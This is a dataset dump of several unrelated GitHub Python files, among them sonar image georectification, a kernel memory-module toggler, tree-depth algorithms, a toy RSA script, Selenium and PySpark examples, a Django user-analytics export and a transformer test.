chunk. Coordinates are filtered to aid computation efficiency.\r\n 2) Geographic, or destination (dst), coordinates for the smoothed trackline\r\n and range extent are loaded from the \"Trackline_Smth_BXXX.csv\" file and\r\n formated as a numpy array and filtered as pix.\r\n 3) A Piecewise Affine Transform is used to map pix coordinates to the shape\r\n of the dst coordinates in order to warp (or rectify) the sonar intensities.\r\n Warped sonar intensities are stored in a new numpy array.\r\n 4) The warped array is then mapped to geographic coordinates using a\r\n transformation matrix and exported as a geotiff.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n remWater : bool\r\n DESCRIPTION - Flag indicating if wcp [False] or pix [True] imagery.\r\n filt : int\r\n DESCRIPTION - Every `filt` ping will be used to fit a spline.\r\n wgs : bool\r\n DESCRIPTION - Flag indicating if sonar images should be rectified using\r\n WGS 1984 coordinate system [True] or UTM state plane [False]\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n self._getRangeCoords()\r\n\r\n -------\r\n Returns\r\n -------\r\n Georectified geotiffs\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n NA\r\n '''\r\n filterIntensity = False\r\n\r\n if son:\r\n # Create output directory if it doesn't exist\r\n outDir = self.outDir # Parent directory\r\n try:\r\n os.mkdir(outDir)\r\n except:\r\n pass\r\n\r\n # Get trackline/range extent file path\r\n trkMetaFile = os.path.join(self.metaDir, \"Trackline_Smth_\"+self.beamName+\".csv\")\r\n\r\n # What coordinates should be used?\r\n ## Use WGS 1984 coordinates and set variables as needed\r\n if wgs is True:\r\n epsg = self.humDat['wgs']\r\n xRange = 'range_lons'\r\n yRange = 'range_lats'\r\n xTrk = 'trk_lons'\r\n yTrk = 'trk_lats'\r\n ## Use projected coordinates and set variables as needed\r\n else:\r\n epsg = self.humDat['epsg']\r\n xRange = 'range_es'\r\n yRange = 'range_ns'\r\n xTrk = 'trk_utm_es'\r\n yTrk = 'trk_utm_ns'\r\n\r\n # # Determine leading zeros to match naming convention\r\n addZero = self._addZero(chunk)\r\n\r\n #################################\r\n # Prepare pixel (pix) coordinates\r\n ## Pix coordinates describe the size of the coordinates in pixel\r\n ## coordinates (top left of image == (0,0); top right == (0,nchunk)...)\r\n\r\n # Filter sonMetaDF by chunk\r\n if not hasattr(self, 'sonMetaDF'):\r\n self._loadSonMeta()\r\n\r\n sonMetaAll = self.sonMetaDF\r\n isChunk = sonMetaAll['chunk_id']==chunk\r\n sonMeta = sonMetaAll[isChunk].reset_index()\r\n # Update class attributes based on current chunk\r\n # self.pingMax = sonMeta['ping_cnt'].astype(int).max() # store to determine max range per chunk\r\n # self.headIdx = sonMeta['index'].astype(int) # store byte offset per ping\r\n # self.pingCnt = sonMeta['ping_cnt'].astype(int) # store ping count per ping\r\n\r\n self.pingMax = np.nanmax(sonMeta['ping_cnt']) # store to determine max range per chunk\r\n self.headIdx = sonMeta['index'] # store byte offset per ping\r\n self.pingCnt = sonMeta['ping_cnt'] # store ping count per ping\r\n\r\n if son:\r\n # Open image to rectify\r\n self._loadSonChunk()\r\n else:\r\n # Rectifying substrate classification\r\n pass\r\n # if filterIntensity:\r\n # self._doPPDRC()\r\n\r\n # Remove shadows\r\n if self.remShadow:\r\n # Get mask\r\n self._SHW_mask(chunk)\r\n\r\n # Mask out shadows\r\n self.sonDat = self.sonDat*self.shadowMask\r\n del self.shadowMask\r\n\r\n # # Pyhum corrections\r\n # do_correct = False\r\n # if do_correct:\r\n # self.sonDat = doPyhumCorrections(self, sonMeta)\r\n\r\n img = self.sonDat\r\n\r\n # For each ping, we need the pixel coordinates where the sonar\r\n ## originates on the trackline, and where it terminates based on the\r\n ## range of the ping. This results in an array of coordinate\r\n ## pairs that describe the edge of the non-rectified image tile.\r\n rows, cols = img.shape[0], img.shape[1] # Determine number rows/cols\r\n pix_cols = np.arange(0, cols) # Create array of column indices\r\n pix_rows = np.linspace(0, rows, 2).astype('int') # Create array of two row indices (0 for points at ping origin, `rows` for max range)\r\n pix_rows, pix_cols = np.meshgrid(pix_rows, pix_cols) # Create grid arrays that we can stack together\r\n pixAll = np.dstack([pix_rows.flat, pix_cols.flat])[0] # Stack arrays to get final map of pix pixel coordinats [[row1, col1], [row2, col1], [row1, col2], [row2, col2]...]\r\n\r\n # Create mask for filtering array. This makes fitting PiecewiseAffineTransform\r\n ## more efficient\r\n mask = np.zeros(len(pixAll), dtype=bool) # Create mask same size as pixAll\r\n mask[0::filt] = 1 # Filter row coordinates\r\n mask[1::filt] = 1 # Filter column coordinates\r\n mask[-2], mask[-1] = 1, 1 # Make sure we keep last row/col coordinates\r\n\r\n # Filter pix\r\n pix = pixAll[mask]\r\n\r\n #######################################\r\n # Prepare destination (dst) coordinates\r\n ## Destination coordinates describe the geographic location in lat/lon\r\n ## or easting/northing that directly map to the pix coordinates.\r\n\r\n # Open smoothed trackline/range extent file\r\n trkMeta = pd.read_csv(trkMetaFile)\r\n trkMeta = trkMeta[trkMeta['chunk_id']==chunk].reset_index(drop=False) # Filter df by chunk_id\r\n # pix_m = trkMeta['pix_m'].min() # Get pixel size\r\n pix_m = self.pixM # Get pixel size\r\n\r\n # Get range (outer extent) coordinates [xR, yR] to transposed numpy arrays\r\n xR, yR = trkMeta[xRange].to_numpy().T, trkMeta[yRange].to_numpy().T\r\n xyR = np.vstack((xR, yR)).T # Stack the arrays\r\n\r\n # Get trackline (origin of ping) coordinates [xT, yT] to transposed numpy arrays\r\n xT, yT = trkMeta[xTrk].to_numpy().T, trkMeta[yTrk].to_numpy().T\r\n xyT = np.vstack((xT, yT)).T # Stack the arrays\r\n del trkMeta\r\n\r\n # Stack the coordinates (range[0,0], trk[0,0], range[1,1]...) following\r\n ## pattern of pix coordinates\r\n dstAll = np.empty([len(xyR)+len(xyT), 2]) # Initialize appropriately sized np array\r\n dstAll[0::2] = xyT # Add trackline coordinates\r\n dstAll[1::2] = xyR # Add range extent coordinates\r\n\r\n # Filter dst using previously made mask\r\n dst = dstAll[mask]\r\n del mask\r\n\r\n ##################\r\n ## Before applying a geographic projection to the image, the image\r\n ## must be warped to conform to the shape specified by the geographic\r\n ## coordinates. We don't want to warp the image to real-world dimensions,\r\n ## so we will normalize and rescale the dst coordinates to give the\r\n ## top-left coordinate a value of (0,0)\r\n\r\n # Determine min/max for rescaling\r\n xMin, xMax = dst[:,0].min(), dst[:,0].max() # Min/Max of x coordinates\r\n yMin, yMax = dst[:,1].min(), dst[:,1].max() # Min/Max of y coordinates\r\n\r\n # Determine output shape dimensions\r\n outShapeM = [xMax-xMin, yMax-yMin] # Calculate range of x,y coordinates\r\n outShape=[0,0]\r\n # Divide by pixel size to arrive at output shape of warped image\r\n outShape[0], outShape[1] = round(outShapeM[0]/pix_m,0), round(outShapeM[1]/pix_m,0)\r\n\r\n # Rescale destination coordinates\r\n # X values\r\n xStd = (dst[:,0]-xMin) / (xMax-xMin) # Standardize\r\n xScaled = xStd * (outShape[0] - 0) + 0 # Rescale to output shape\r\n dst[:,0] = xScaled # Store rescaled x coordinates\r\n\r\n # Y values\r\n yStd = (dst[:,1]-yMin) / (yMax-yMin) # Standardize\r\n yScaled = yStd * (outShape[1] - 0) + 0 # Rescale to output shape\r\n dst[:,1] = yScaled # Store rescaled y coordinates\r\n\r\n ########################\r\n # Perform transformation\r\n # PiecewiseAffineTransform\r\n tform = PiecewiseAffineTransform()\r\n tform.estimate(pix, dst) # Calculate H matrix\r\n\r\n ##############\r\n # Save Geotiff\r\n ## In order to visualize the warped image in a GIS at the appropriate\r\n ## spatial extent, the pixel coordinates of the warped image must be\r\n ## mapped to spatial coordinates. This is accomplished by calculating\r\n ## the transformation matrix using rasterio.transform.from_origin\r\n\r\n # First get the min/max values for x,y geospatial coordinates\r\n xMin, xMax = dstAll[:,0].min(), dstAll[:,0].max()\r\n yMin, yMax = dstAll[:,1].min(), dstAll[:,1].max()\r\n\r\n # Calculate x,y resolution of a single pixel\r\n xres = (xMax - xMin) / outShape[0]\r\n yres = (yMax - yMin) / outShape[1]\r\n # # Scale by factor for down/upsampling\r\n # xres = (xMax - xMin) / (outShape[0]*pix_res_factor)\r\n # yres = (yMax - yMin) / (outShape[1]*pix_res_factor)\r\n\r\n # Calculate transformation matrix by providing geographic coordinates\r\n ## of upper left corner of the image and the pixel size\r\n transform = from_origin(xMin - xres/2, yMax - yres/2, xres, yres)\r\n\r\n if self.rect_wcp:\r\n imgOutPrefix = 'rect_wcp'\r\n outDir = os.path.join(self.outDir, imgOutPrefix) # Sub-directory\r\n\r\n try:\r\n os.mkdir(outDir)\r\n except:\r\n pass\r\n\r\n # egn\r\n if self.egn:\r\n self._egn_wcp(chunk, sonMeta)\r\n self._egnDoStretch()\r\n\r\n img = self.sonDat.copy()\r\n\r\n img[0]=0 # To fix extra white on curves\r\n\r\n # Warp image from the input shape to output shape\r\n out = warp(img.T,\r\n tform.inverse,\r\n output_shape=(outShape[1], outShape[0]),\r\n mode='constant',\r\n cval=np.nan,\r\n clip=False,\r\n preserve_range=True)\r\n\r\n # Rotate 180 and flip\r\n # https://stackoverflow.com/questions/47930428/how-to-rotate-an-array-by-%C2%B1-180-in-an-efficient-way\r\n out = np.flip(np.flip(np.flip(out,1),0),1).astype('uint8')\r\n\r\n projName = os.path.split(self.projDir)[-1] # Get project name\r\n beamName = self.beamName # Determine which sonar beam we are working with\r\n imgName = projName+'_'+imgOutPrefix+'_'+beamName+'_'+addZero+str(int(chunk))+'.tif' # Create output image name\r\n\r\n gtiff = os.path.join(outDir, imgName) # Output file name\r\n\r\n # Export georectified image\r\n with rasterio.open(\r\n gtiff,\r\n 'w',\r\n driver='GTiff',\r\n height=out.shape[0],\r\n width=out.shape[1],\r\n count=1,\r\n dtype=out.dtype,\r\n crs=epsg,\r\n transform=transform,\r\n compress='lzw'\r\n ) as dst:\r\n dst.nodata=0\r\n dst.write(out,1)\r\n dst.write_colormap(1, self.son_colorMap)\r\n dst=None\r\n ## Uncomment below code if overviews should be created for each file\r\n # dst.build_overviews([2 ** j for j in range(1,8)], Resampling.nearest)\r\n # dst.update_tags(ns='rio_overview', resampling='nearest')\r\n # dst.close()\r\n\r\n del out, dst, img\r\n\r\n if self.rect_wcr:\r\n imgOutPrefix = 'rect_wcr'\r\n outDir = os.path.join(self.outDir, imgOutPrefix) # Sub-directory\r\n\r\n if son:\r\n try:\r\n os.mkdir(outDir)\r\n except:\r\n pass\r\n\r\n self._WCR_SRC(sonMeta)\r\n\r\n # Empirical gain normalization\r\n if not self.rect_wcp:\r\n if self.egn:\r\n self._egn()\r\n self.sonDat = np.nan_to_num(self.sonDat, nan=0)\r\n self._egnDoStretch()\r\n\r\n img = self.sonDat\r\n\r\n img[0]=0 # To fix extra white on curves\r\n\r\n # Warp image from the input shape to output shape\r\n out = warp(img.T,\r\n tform.inverse,\r\n output_shape=(outShape[1], outShape[0]),\r\n mode='constant',\r\n cval=np.nan,\r\n clip=False,\r\n preserve_range=True)\r\n\r\n del img, self.sonDat\r\n\r\n # Warping substrate classification adds anomlies which must be removed\r\n if not son:\r\n # Set minSize\r\n min_size = 1500\r\n\r\n # Label all regions\r\n lbl = label(out)\r\n\r\n # First set small objects to background value (0)\r\n noSmall = remove_small_objects(lbl, min_size)\r\n del lbl\r\n\r\n # Punch holes in original label\r\n holes = ~(noSmall==0)\r\n del noSmall\r\n\r\n l = out*holes\r\n\r\n # Remove small holes\r\n # Convert l to binary\r\n binary_objects = l.astype(bool)\r\n # Remove the holes\r\n binary_filled = remove_small_holes(binary_objects, min_size)\r\n # Recover classification with holes filled\r\n out = watershed(binary_filled, l, mask=binary_filled)\r\n del binary_objects, binary_filled, l\r\n\r\n # Rotate 180 and flip\r\n # https://stackoverflow.com/questions/47930428/how-to-rotate-an-array-by-%C2%B1-180-in-an-efficient-way\r\n out = np.flip(np.flip(np.flip(out,1),0),1).astype('uint8')\r\n\r\n projName = os.path.split(self.projDir)[-1] # Get project name\r\n beamName = self.beamName # Determine which sonar beam we are working with\r\n imgName = projName+'_'+imgOutPrefix+'_'+beamName+'_'+addZero+str(int(chunk))+'.tif' # Create output image name\r\n\r\n if son:\r\n gtiff = os.path.join(outDir, imgName) # Output file name\r\n else:\r\n outDir = os.path.join(self.substrateDir, 'map_sub')\r\n if not os.path.exists(outDir):\r\n os.mkdir(outDir)\r\n gtiff = os.path.join(outDir, imgName) # Output file name\r\n gtiff = gtiff.replace(imgOutPrefix, 'sub_map')\r\n\r\n\r\n # Export georectified image\r\n with rasterio.open(\r\n gtiff,\r\n 'w',\r\n driver='GTiff',\r\n height=out.shape[0],\r\n width=out.shape[1],\r\n count=1,\r\n dtype=out.dtype,\r\n crs=epsg,\r\n transform=transform,\r\n compress='lzw',\r\n resampling=Resampling.bilinear\r\n ) as dst:\r\n dst.nodata=0\r\n dst.write(out,1)\r\n dst.write_colormap(1, self.son_colorMap)\r\n dst=None\r\n ## Uncomment below code if overviews should be created for each file\r\n # dst.build_overviews([2 ** j for j in range(1,8)], Resampling.nearest)\r\n # dst.update_tags(ns='rio_overview', resampling='nearest')\r\n # dst.close()\r\n\r\n del out, dst\r\n\r\n gc.collect()\r\n\r\n # DON\"T RETURN SELF\r\n # Unnecessary here and leads to massive memory leaks\r\n # Also very slow\r\n\r\n return\r\n\r\n #===========================================================================\r\n def _getSonColorMap(self, name):\r\n '''\r\n '''\r\n\r\n son_colorMap = {}\r\n try:\r\n color = cm.get_cmap(name, 256) \r\n except:\r\n print('****WARNING*****\\n', name, 'is not a valid colormap.\\nSetting to Greys...')\r\n color = cm.get_cmap('Greys', 256)\r\n\r\n # need to get values for 0-255 but test_color in 0-1\r\n color = color(np.linspace(0, 1, 256))\r\n color = rescale(color, 0, 255).astype('uint8')\r\n\r\n vals = range(0, 255)\r\n for i,v in zip(vals, (color)):\r\n son_colorMap[i] = tuple(v)\r\n\r\n self.son_colorMap = son_colorMap\r\n del son_colorMap, color\r\n return\r\n","repo_name":"CameronBodine/PINGMapper","sub_path":"src/class_rectObj.py","file_name":"class_rectObj.py","file_ext":"py","file_size_in_byte":57914,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"1620562819","text":"import logging\n\nimport config\n\nlogger = logging.getLogger(__name__)\n\n\ndef _set_active(mod, active):\n available = False\n try:\n with open(\"/sys/module/%s/parameters/enabled\" % mod, 'r') as f:\n if f.read(1) == 'Y':\n available = True\n except IOError:\n pass\n if not available:\n if active:\n logger.error(\"Failed to activate %s: Module is unavailable\" % mod)\n return\n try:\n with open(\"/sys/module/%s/parameters/active\" % mod, 'w') as f:\n f.write('Y' if active else 'N')\n except IOError as err:\n logger.error(\"Failed to %s %s: %s\" %\n (\"activate\" if active else \"deactivate\", mod, err))\n else:\n logger.info(\"%s %s\" %\n (mod, \"activated\" if active else \"deactivated\"))\n\n\ndef initialize():\n if config.TMEM__TCACHE:\n _set_active('tcache', True)\n if config.TMEM__TSWAP:\n _set_active('tswap', True)\n\n\ndef finilize():\n if config.TMEM__TCACHE:\n _set_active('tcache', False)\n if config.TMEM__TSWAP:\n _set_active('tswap', False)\n","repo_name":"Cloudxtreme/vcmmd","sub_path":"vcmmd/tmem.py","file_name":"tmem.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"31981137524","text":" \n\nclass Solution2(object):\n def maxDepth(self, root):\n if not root:\n return 0\n return 1+ max(self.maxDepth(root.right),self.maxDepth(root.left))\n\n# Depth of last node will be the greatest\nclass BFS(object):\n def maxDepth(self, root):\n if not root:\n return 0\n queue = [(root,1),]\n while queue:\n node, val = queue.pop(0)\n if node.left:\n queue.append((node.left, val+1),)\n if node.right:\n queue.append((node.right, val+1),)\n if not queue:\n return val\n\nclass IterativeDFS(object):\n def maxDepth(self, root):\n stack = []\n if not root:\n return 0\n stack.append((1, root),)\n depth = 0\n while stack:\n current_depth, root = stack.pop()\n if root:\n depth = max(depth, current_depth)\n stack.append((current_depth + 1, root.left))\n stack.append((current_depth + 1, root.right))\n return depth","repo_name":"bailey8/Algorithms-and-Data-Structures","sub_path":"LEETCODELEETCODE/CC Graph Cycle Traversals/Tree/MaximumDepthOfBinaryTree.py","file_name":"MaximumDepthOfBinaryTree.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"234720638","text":"\nfrom random import randint\n\ndef pgcd(a, b):\n if b == 0:\n return a\n else:\n r = a % b\n return pgcd(b, r)\n\ndef getFactors(n):\n factors = [];\n for i in range(1, n + 1):\n if n % i == 0:\n factors.append(i)\n return factors\n\ndef get_p_q():\n\ta = randint(100, 999)\n\twhile True:\n\t\tif getFactors(a) == [1, a]:\n\t\t\treturn a\n\t\t\tbreak\n\t\ta = randint(100, 999) \n\ndef generator():\n\tp,q = get_p_q(),get_p_q()\n\t#p,q = 137, 751\n\tn = p*q\n\tpn = (p-1)*(q-1)\n\n\tif p > q:\n\t\tg = p\n\n\tif q > p:\n\t\tg = q\n\n\te = g + 1\n\twhile e < pn:\n\t\tif pgcd(pn, e) == 1:\n\t\t\t#print(\"e = \", e)\n\t\t\tbreak\n\t\te = e + 1\n\n\td = e + 1\n\twhile d < pn:\n\t\tif e * d % pn == 1:\n\t\t\t#print(\"d = \", d)\n\t\t\tbreak\n\t\td = d + 1\n\tpublic_key = e,n\n\tprivate_key = d,n\n\tprint(\"your public key is: \", public_key)\n\tprint(\"your private key is: \", private_key)\n\ndef en_crypt(e, n):\n\tprint(\"entrer le message à crypter\")\n\tc = input()\n\td = []\n\tfor i in c:\n\t\td.append(ord(i))\n\tv = 0\n\tcrypt_d = []\n\twhile v < len(d):\n\t\tcrypt_d.append(pow(d[int(v)], e)%n)\n\t\tv = v + 1\n\tprint(crypt_d)\n\td = []\n\ndef de_crypt(d, n):\n\tprint(\"Entrer le message à décrypter (s'éparer les nombres par des virgules)\")\n\tcc = input().split(\",\")\n\tcc = list(map(int, cc))\n\tv2 = 0\n\td2 = []\n\twhile v2 < len(cc):\n\t\td2.append(pow(cc[int(v2)], d)%n)\n\t\tv2 = v2 + 1\n\t#print(d2)\n\n\tj = []\n\tfor i in d2:\n\t\tj.append(chr(i))\n\tj = ''.join(j)\n\tprint(j)\n\tj = []\n","repo_name":"ebdm13/RSA-algorythme-module","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20117858242","text":"# import Selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\n# Webdriver Configuration with chrome driver\ndriver = webdriver.Chrome(r\"D:\\selenium\\drivers\\chromedriver.exe\")\n\n\n# Load Web APP/URL\ndriver.set_page_load_timeout(\"50\")\ndriver.get(r\"https://thetestingworld.com/testings/\")\n\n# Maximize browser window\ndriver.maximize_window()\n\ndriver.find_element_by_name('fld_username').send_keys(\"ABCD\")\naction = ActionChains(driver)\naction.send_keys(Keys.CONTROL).send_keys('a').perform()\ntime.sleep(5)\n\ntime.sleep(5)\n\naction.send_keys(Keys.ESCAPE).perform()\ntime.sleep(5)\naction.context_click()\ntime.sleep(5)\naction.click(driver.find_element_by_id(\"tab2\"))\ntime.sleep(10)\n\ndriver.close()","repo_name":"salvieknath18/python_work","sub_path":"selenium/second_script.py","file_name":"second_script.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12872329692","text":"import os\n\nfrom setuptools import setup, find_packages\n\n__ROOT_DIR__ = os.path.abspath(os.path.dirname(__file__))\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\n\ndef readme():\n with open(os.path.join(__ROOT_DIR__, 'README.md')) as f:\n return f.read()\n\n\ndef get_info():\n info = {}\n with open(os.path.join(__ROOT_DIR__, 'django_pyctx', '__version__.py'), 'r') as f:\n exec(f.read(), info)\n return info\n\n\npackage_info = get_info()\n\nsetup(name=package_info['__title__'],\n version=package_info['__version__'],\n description=package_info['__description__'],\n long_description=readme(),\n long_description_content_type='text/markdown',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Framework :: Django :: 2.0',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.7',\n ],\n keywords='pyctx django django-pyctx django-req-ctx context',\n url=package_info['__url__'],\n author=package_info['__author__'],\n author_email=package_info['__author_email__'],\n license=package_info['__license__'],\n packages=find_packages(),\n install_requires=[\n 'pyctx',\n 'django',\n ],\n zip_safe=False,\n )\n","repo_name":"molcay/django-pyctx","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34745400444","text":"import os\n'''\n递归遍历目录\n'''\ndef getAllFires(path,sp):\n fileList = os.listdir(path)\n sp+=\" \"\n for fileName in fileList:\n fileAbsPath = os.path.join(path,fileName)\n if os.path.isdir(fileAbsPath):\n print(sp + \"目录: \" + fileName)\n getAllFires(fileAbsPath,sp)\n else:\n print(sp + \"普通文件:\" + fileName)\n# getAllFires(\"/Users/ywh/CODESRC\",\" \")\n'''\n深度遍历\n'''\ndef getAllPathDeep(path):\n stack = []\n stack.append(path)\n while len(stack) !=0:\n dirPath=stack.pop()\n filesList = os.listdir(dirPath)\n for fileName in filesList:\n fileAbsPath = os.path.join(dirPath, fileName)\n if os.path.isdir(fileAbsPath):\n stack.append(fileAbsPath)\n print(\"目录:\" + fileName)\n else:\n print( \"普通文件:\" + fileName)\n\ngetAllPathDeep(\"/Users/ywh/CODESRC\")","repo_name":"Dylan0917/PYTHONLEARNING","sub_path":"com/p1/递归/f1.py","file_name":"f1.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73438366312","text":"from pyspark import SparkContext\nfrom pyspark import SparkConf\n\ndef safe_str(obj):\n try:\n s2 = str(obj)\n except:\n s2 = obj.encode('utf-8').strip()\n return s2\n\nconf = SparkConf().setAppName(\"CALCULATE NB RATINGS - Pyhon Spark\")\nsc=SparkContext(conf=conf)\ndataRatings =sc.textFile(\"/user/student/MiniProject/ratings.dat\")\ndataRatingSplitted = dataRatings.map(lambda line: line.split(\"::\"))\nrc = dataRatingSplitted.map(lambda line: (line[2],1))\nrc_reduce = rc.reduceByKey(lambda a,b: a+b)\ncsvrc_reduce=rc_reduce.map(lambda list: ','.join(safe_str(elt) for elt in list))\n#Stockage sous HDFS\ncsvrc_reduce.saveAsTextFile(\"hdfs:///user/student/output-RalingsVaue/\")\nsc.stop()\n","repo_name":"lhamiche/HAMICHE_Lotfi_DJELLALI_Ferroudja_Hadoop_Projet","sub_path":"SCRIPTS/PySpark_app.py","file_name":"PySpark_app.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14897146589","text":"from brainiak.utils.sparql import QUERY_VALUE_EXISTS, is_result_true\nfrom tests.sparql import QueryTestCase\n\n\nclass ValidateUniquenessTestCase(QueryTestCase):\n\n graph_uri = \"http://example_alternative.onto/\"\n fixtures_by_graph = {\n graph_uri: [\"tests/sample/animalia.n3\"]\n }\n maxDiff = None\n\n def test_query(self):\n query_params = {\n \"graph_uri\": self.graph_uri,\n \"class_uri\": \"http://example.onto/City\",\n \"instance_uri\": \"http://example.onto/York\",\n \"predicate_uri\": \"http://example.onto/nickname\",\n \"object_value\": '\"City of York\"'\n }\n query = QUERY_VALUE_EXISTS % query_params\n query_result = self.query(query)\n self.assertTrue(is_result_true(query_result))\n\n def test_query_answer_false(self):\n query_params = {\n \"graph_uri\": self.graph_uri,\n \"class_uri\": \"http://example.onto/City\",\n \"instance_uri\": \"http://example.onto/York\",\n \"predicate_uri\": \"http://example.onto/nickname\",\n \"object_value\": '\"Unexistent value\"'\n }\n query = QUERY_VALUE_EXISTS % query_params\n query_result = self.query(query)\n self.assertFalse(is_result_true(query_result))\n","repo_name":"bmentges/brainiak_api","sub_path":"tests/integration/test_utils_sparql.py","file_name":"test_utils_sparql.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"11414497741","text":"from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User, Group\nfrom app.users.models import UserProfile, Countries, Region\nfrom app.market.models import MarketItem\nfrom django.core.exceptions import ObjectDoesNotExist\nimport logging\nimport csv\n\nlogger = logging.getLogger('notifications')\n\n\nclass Command(BaseCommand):\n args = ''\n help = 'User analytics 0620'\n\n def handle(self, *args, **options):\n user_list = []\n all_users = User.objects.all()\n\n middle_east_region = Region.objects.get(name='Middle East')\n count_all = Countries.objects.all().count()\n count_middle_east = Countries.objects.filter(region=middle_east_region).count()\n\n journalist_group = Group.objects.get(name='Journalists')\n lawyer_group = Group.objects.get(name='Lawyers')\n provider_group = Group.objects.get(name='Provider')\n\n for u in all_users:\n try:\n profile = UserProfile.objects.get(user=u)\n except ObjectDoesNotExist:\n profile = None\n if not profile:\n continue\n\n u_countries = profile.countries.all()\n u_countries_name = [c.countries for c in u_countries]\n if 'Iran' in u_countries_name:\n has_iran = True\n else:\n has_iran = False\n\n if u_countries.count() == count_all:\n has_all_countries = True\n else:\n has_all_countries = False\n\n if u_countries.filter(region=middle_east_region).count() == count_middle_east:\n has_all_middle_east = True\n else:\n has_all_middle_east = False\n\n has_request = MarketItem.objects.filter(owner=u, item_type='request').count() > 0\n has_offer = MarketItem.objects.filter(owner=u, item_type='offer').count() > 0\n\n if journalist_group in u.groups.all():\n in_journalist_group = True\n else:\n in_journalist_group = False\n\n if lawyer_group in u.groups.all():\n in_lawyer_group = True\n else:\n in_lawyer_group = False\n\n if provider_group in u.groups.all():\n in_provider_group = True\n else:\n in_provider_group = False\n\n u_skills = profile.skills.all()\n u_skills_list = \" \".join([s.skills for s in u_skills])\n\n user = {\n 'id': u.id,\n 'email': u.email,\n 'username': u.username,\n 'first_name': u.first_name,\n 'last_name': u.last_name,\n 'has_iran': has_iran,\n 'has_all_middle_east': has_all_middle_east,\n 'has_all_countries': has_all_countries,\n 'has_request': has_request,\n 'has_offer': has_offer,\n 'in_journalist_group': in_journalist_group,\n 'in_lawyer_group': in_lawyer_group,\n 'in_provider_group': in_provider_group,\n 'skills_list': u_skills_list\n }\n\n user_list.append(user)\n\n with open('user_list.csv', 'wb') as write_file:\n w = csv.writer(write_file)\n w.writerow(['ID', 'EMAIL', 'USERNAME', 'IRAN SELECTED', 'MIDDLE EAST SELECTED', 'ALL COUNTRIES SELECTED',\n 'HAS POSTED OFFER', 'HAS POSTED REQUEST', 'MEMBER OF PROVIDERS', 'MEMBER OF LAWYERS',\n 'MEMBER OF JOURNALIST GROUP', 'SKILLS'])\n for u in user_list:\n row = [u['id'], unicode(u['email']).encode('utf-8'), unicode(u['username']).encode('utf-8'),\n u['has_iran'], u['has_all_middle_east'], u['has_all_countries'], u['has_offer'],\n u['has_request'], u['in_provider_group'], u['in_lawyer_group'], u['in_journalist_group'],\n u['skills_list']]\n w.writerow(row)\n","repo_name":"ahguerilla/movements","sub_path":"app/app/management/commands/analytics_0626.py","file_name":"analytics_0626.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31055277274","text":"import tensorflow as tf\nimport numpy as np\nfrom jag.models.transformer import TransformerEncoder\n\n\ndef test_transormer_shape():\n '''Call the transformer shape test n times to ensure stochasticity\n in parameter check.'''\n\n n = 10\n for _ in range(n):\n eval_transformer_shape()\n\n\ndef eval_transformer_shape(params=None):\n '''Basic test to make sure tensorflow is properly installed'''\n\n if not params:\n params = {\n 'n_layers': 3,\n 'd_inner': 50,\n 'n_head': 5,\n 'd_k': 15,\n 'd_v': 15,\n 'embedding_dropout': 0.1,\n 'attention_dropout': 0.1,\n 'residual_dropout': 0.1,\n 'embedding_layer_norm': False,\n 'layer_norm_epsilon': 1e-5,\n 'neg_inf': float(-1e9),\n 'trainable_pos_embedding': True,\n 'use_one_embedding_dropout': True,\n 'use_gelu': False,\n 'accurate_gelu': False,\n 'task_dropout': 0.1,\n }\n\n vocab_size = np.random.randint(20, 50)\n max_len = np.random.randint(10, 25)\n num_segments = 2\n d_model = np.random.randint(5, 20)\n d_out = d_model\n\n use_attn_mask = True if np.random.randint(0, 2) == 1 else False\n use_pad_mask = True if np.random.randint(0, 2) == 1 else False\n\n use_pooler = True if np.random.randint(0, 2) == 1 else False\n use_masked_lm = True if np.random.randint(0, 2) == 1 else False\n use_next_sp = True if np.random.randint(0, 2) == 1 else False\n\n do_seq_class_task = True if np.random.randint(0, 2) == 1 else False\n do_tok_class_task = True if np.random.randint(0, 2) == 1 else False\n do_qa_task = True if np.random.randint(0, 2) == 1 else False\n do_mult_choice_task = True if np.random.randint(0, 2) == 1 else False\n\n if do_seq_class_task or do_mult_choice_task:\n use_pooler = True\n\n # batch_size must be a multiple of this params\n task_num_choices = np.random.randint(2, 4)\n seq_class_num_labels = np.random.randint(2, 5)\n tok_class_num_labels = np.random.randint(2, 6)\n\n params['vocab_size'] = vocab_size\n params['max_len'] = max_len\n params['num_segments'] = num_segments\n params['d_model'] = d_model\n params['d_out'] = d_out\n\n params['use_attn_mask'] = use_attn_mask\n params['use_pad_mask'] = 